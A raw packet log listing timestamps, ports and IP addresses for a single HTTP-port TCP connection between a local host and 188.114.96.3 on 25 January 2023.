Jan 25, 2023 09:28:11.999027014 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:11.999073982 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:11.999104977 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:11.999125004 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:11.999125004 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:11.999174118 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:11.999419928 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:11.999744892 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:11.999797106 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:11.999841928 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:11.999886990 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:11.999888897 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:11.999937057 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:11.999939919 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:11.999984026 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.000027895 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.000060081 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:12.000731945 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.000796080 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.000828028 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:12.000859976 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.000905991 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.000952959 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.000968933 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:12.001002073 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.001005888 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:12.001048088 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.001719952 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.001769066 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.001812935 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.001813889 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:12.001858950 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.001873970 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:12.001907110 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.001952887 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.001976013 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:12.002001047 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.002002001 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:12.002713919 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.002774954 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.002821922 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.002867937 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.002907038 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:12.002907038 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:12.002914906 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.002962112 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.003011942 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.003037930 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:12.003093958 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:12.003662109 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.003710032 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.003756046 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.003799915 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.003830910 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:12.003843069 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.003858089 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:12.003889084 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.003935099 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.004072905 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:12.004618883 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.004678965 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.004725933 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.004755974 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:12.004771948 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.004820108 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.004828930 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:12.004867077 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.004914045 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.004935980 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:12.005101919 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:12.005558968 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.005604029 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.005651951 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.005681038 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:12.005697012 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.005759001 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.005781889 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:12.005821943 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.005868912 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.005883932 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:12.006593943 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.006643057 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.006688118 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.006740093 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:12.006756067 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.006789923 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.006844044 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.006899118 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.006901026 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:12.007014036 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:12.007539988 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.007589102 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.007635117 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.007680893 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.007680893 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:12.007728100 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.007775068 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.007786989 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:12.007824898 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.007852077 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:12.007870913 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.007935047 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:12.008658886 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.008696079 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.008728981 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.008761883 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.008766890 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:12.008795977 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.008830070 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.008860111 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:12.008863926 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.008893013 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:12.009574890 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.009609938 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.009644032 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.009676933 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.009676933 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:12.009715080 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.009757996 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:12.009802103 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:12.009824991 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.009860992 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.009948969 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:12.011282921 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.011322021 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.011356115 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.011389971 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.011399031 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:12.011425018 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.011460066 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.011493921 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.011527061 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.011548042 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:12.011548042 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:12.011560917 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.011583090 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:12.011596918 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.011634111 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.011667013 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.011708975 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:12.011722088 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.011765003 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.011795044 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:12.011823893 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:12.012514114 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.012548923 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.012573004 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.012595892 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.012629986 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.012665033 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.012697935 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.012749910 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:12.012798071 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:12.015551090 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.015587091 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.015619993 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.015652895 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.015675068 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:12.015686989 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.015708923 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:12.015758991 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:12.015801907 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.015836954 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.015897036 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:12.016072989 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.016155958 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.016191006 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.016223907 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:12.016226053 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.016262054 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.016310930 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.016310930 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:12.016350985 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.016370058 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:12.016491890 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.016556978 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:12.017518997 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.017556906 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.017591000 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.017626047 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.017659903 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.017664909 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:12.017693996 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.017699957 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:12.017729044 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.017780066 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:12.018076897 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:12.018145084 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.018188953 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.018224001 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.018258095 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.018274069 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:12.018292904 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.018311977 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:12.018335104 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.018363953 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.018413067 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:12.018441916 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:12.018752098 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:12.019064903 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.071594954 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:12.476766109 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:12.476815939 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:12.495311975 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.495357990 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.559402943 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.559458017 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.559540033 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:12.659390926 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:12.659440994 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:12.676496983 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.676548958 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.739047050 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.739130020 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.739200115 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.739244938 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:12.739273071 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.739340067 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.739402056 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.739464998 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.739527941 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.739588022 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.739650011 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.739686966 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:12.739712954 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.739712954 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:12.739775896 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.739837885 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.739856958 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:12.739903927 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.739965916 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.740021944 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:12.740027905 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.740089893 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.740096092 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:12.740150928 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.740216017 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.740278006 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.740281105 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:12.740343094 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.740401983 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:12.740403891 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.740467072 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.740480900 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:12.740530014 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.740585089 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.740649939 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.740688086 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:12.740710974 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.740724087 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:12.740773916 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.740833044 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.740843058 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:12.740894079 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.740952969 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.741014957 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.741075993 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.741089106 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:12.741137028 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.741199970 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.741261005 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:12.741262913 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.741322994 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:12.741326094 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.741388083 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.741451025 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:12.741451979 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.741517067 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.741574049 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:12.741578102 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.741642952 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.741703033 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.741741896 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:12.741764069 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.741823912 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:12.741826057 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.741890907 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.741940022 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:12.741954088 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.742018938 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.742080927 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.742090940 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:12.742141962 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.742197037 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:12.742206097 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.742268085 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.742321014 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:12.742330074 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.742392063 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.742450953 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:12.742451906 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.742517948 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.742573023 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:12.742578983 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.742640018 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.742695093 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:12.742737055 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.742803097 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.742856026 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:12.742866039 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.742928982 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.742979050 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:12.742990971 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.743052959 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.743110895 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.743119001 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:12.743180037 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.743235111 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:12.743242025 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.743309975 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.743369102 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:12.743379116 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.743474960 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.743536949 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.743598938 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:12.743601084 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.743665934 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.743666887 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:12.743726015 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.743783951 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:12.743788958 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.743853092 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.743915081 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:12.743916988 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.743983984 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.744033098 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.744045973 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:12.748080015 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:12.781373024 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.781450033 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.781492949 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:12.781511068 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.781579971 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.781640053 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:12.781642914 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.781701088 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:12.781703949 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.781764984 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.781827927 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.781882048 CET	49736	80	192.168.2.4	188.114.96.3
